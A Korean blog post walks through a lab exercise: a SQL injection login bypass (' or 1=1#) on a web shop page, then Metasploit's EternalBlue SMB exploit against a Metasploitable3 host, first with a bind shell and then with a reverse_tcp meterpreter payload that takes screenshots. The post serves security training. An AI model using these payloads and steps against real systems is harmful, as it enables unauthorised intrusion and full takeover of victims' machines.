끄적끄적 아무기록

eternalblue(이터널블루)를 이용한 smb취약점 공격

by 현생사는갓생지망생
반응형

Eternalblue(이터널블루)를 이용한 SMB취약점 공격


CentOS5.3(Web) >


httpd와 mysqld 서비스를 시작한다.


만약 시작이 안 되면 vi /etc/httpd/conf.d/ssl.conf 파일에서 SSLEngine on → off로 변경해준다.


주소창에 CentOS IP(1.0.0.55)를 치고 core mall 페이지로 접속한다.

ID/PW를 모르므로 SQL Injection을 이용하여 ' or 1=1# / 1 을 입력 후 로그인한다.


Meta3 >


Meta3의 139번 포트를 허용해준다.


kali >


DB사용하기 위해 postgresql 서비스 시작한다.


msfconsole로 접속한다.


search smb 명령어를 입력하여 smb취약점을 검색한다.


auxiliary는 탐색을, exploit은 취약점을 뜻한다.


코드를 알면 코드로 검색해도 된다.


exploit/windows/smb/ms17_010_eternalblue를 이용할 것이다.

항상 show options로 확인을 해주어야 한다.

RHOST부분이 Required - yes인데 비어있으므로 값을 입력해야 한다.


rhost=[공격대상 IP]

1.0.0.54(Meta3)를 공격해볼 것이다.


원래는 target도 지정해주어야 하는데

위와 같이 타겟이 하나 뿐일 경우 굳이 지정해주지 않아도 무방하다.

설정을 완료했다면 run 또는 exploit


공격이 성공했다면 Meta3의 쉘로 접속하게 된다.


이번엔 다른 방식으로 공격을 해보자.

위에서 시도했던 공격 방식은 bind 연결 방식이며, 공격자에서 대상에게 직접 연결을 시도한다.

이 경우에는 방화벽이 막혀있으면 공격이 힘들다는 단점이 있다.

이번에 시도해볼 공격 방식은 reverse 연결 방식이며, 공격 대상에서 공격자에게 반대로 연결한다.

# set payload windows/x64/meterpreter/reverse_tcp

payload를 설정한다.


포트는 그대로 써도 되고, 바꿔줘도 된다.


bind연결 방식으로 공격했을 땐 쉘로 들어갔지만 지금은 meterpreter로 접속하게 된다.


screenshot을 찍어보자.


성공적으로 screenshot이 찍혀서 저장되었으며,

meterpreter가 뜨면 사실상 제어권이 다 넘어온 것이라 봐도 무방하다.


background로 넘어가서 연결된 세션을 확인할 수 있다.

연결을 끊은 것이 아니므로 sessions [id] 명령어로 다시 돌아갈 수 있다.


연결을 끊고싶다면 sessions -k [id]


 

반응형

블로그의 정보

현생이네

현생사는갓생지망생

활동하기